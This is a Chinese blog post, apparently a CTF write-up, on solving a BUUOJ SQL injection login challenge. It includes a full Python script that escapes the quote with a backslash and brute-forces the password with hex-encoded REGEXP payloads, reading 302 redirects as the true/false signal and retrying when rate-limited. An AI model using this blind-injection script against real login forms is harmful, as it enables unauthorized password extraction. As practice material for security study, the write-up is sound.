看不进去书了 做道题
题目给了语句select * from users where username='' and passwd=''
简单fuzz一下会发现过滤了绝大多数字符和查询语句
可以拿到\
在username处输入一个\让单引号逃逸
然后在passwd里用正则匹配字符 按位爆破
exp:

import requests
url='http://e516ba55-43db-4235-ac20-ce2fb9919d95.node3.buuoj.cn/index.php'

#print(data['username'])
#print(data['passwd'])
def str2hex(string):
    c='0x'
    a=''
    for i in string:
        a+=hex(ord(i))
    return c+a.replace('0x','')
def sqli(payload):
    poc='||passwd/**/REGEXP/**/{};\x00'.format(payload)
    data = {
        'username': '\\',
        'passwd': poc
    }
   # print(data['passwd'])
    a=requests.post(url, data=data, allow_redirects=False)
   # print(requests.post(url,data=data,allow_redirects=False).status_code)
    if a.status_code==302:
        return payload
    if a.status_code!=200 and a.status_code!=302:
        return sqli(payload)
    return ''
alphabet = ['!','|','[',']','{','}','_','/','-','&',"%",'#','@','a','b','c','d','e','f','g','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
password='^'
#test=str2hex('^y')
#sqli(test)
while True:
    for i in alphabet:
        mid=password+i
        #print(mid)
        a=str2hex(mid)
        #print(a)
        b=sqli(a)
        if b!='':
            password+=i
            break
    print(password.replace('^',''))

考虑到有的字符可能会被过滤 我自己写了个函数把字符转成16进制再传进去
这道题特意留下了双引号 其实没有双引号也是可以做的(魔改题警告)
然后递归纯属为了防止429- -
每跑出一个字符就加到函数的参数里 一位一位跑很快就跑出来了

跑出来之后不知道要怎么登陆...admin是被过滤的
然后转念一想其实302跳转的时候就已经是满足语句 可以跳转了 就算登录上也没意义
思考了半天 没忍住去github看了眼源码

出题人算你狠

溜了溜了 复习

分类: 技术

0 条评论

发表评论

邮箱地址不会被公开。 必填项已用*标注